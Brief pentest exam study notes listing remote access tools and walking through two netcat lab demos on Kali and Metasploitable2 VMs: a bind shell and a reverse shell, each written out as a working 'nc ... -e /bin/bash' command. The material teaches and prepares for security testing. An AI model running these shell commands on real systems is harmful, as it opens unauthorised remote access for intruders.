Remote Access Tools
| Tool | Notes | URL |
|---|---|---|
| SSH | Secure shell | Included or available in most OSs |
| NCAT | Similar to nc, but from Nmap developers | https://nmap.org/ncat/ |
| NETCAT | Same as nc | Included or available in most OSs |
| Proxychains | Forces TCP connections through a proxy | https://github.com/haad/proxuchains |
DEMO 1
Blind shell
Attacker: Kali Linux Target: Metasploitable2
Run the following commands on Target VM.
nc -lvp 4444 -e /bin/bash

Then Run the following commands on Attacker VM.
nc 10.0.0.21 4444


DEMO 2
Reverse shell
Attacker: Kali Linux Target: Metasploitable2
Run the following commands on Attacker VM.
nc -lvp 4444

Then Run the following commands on Target VM.
nc 10.0.0.18 4444 -e /bin/bash


QUICK REVIEW
- There are multiple ways to leverage remote connections
- The PenTests exam focuses on command-line tools for remote access
- Remote access is often followed by privilege escalation attacks and/or preceded by credential attacks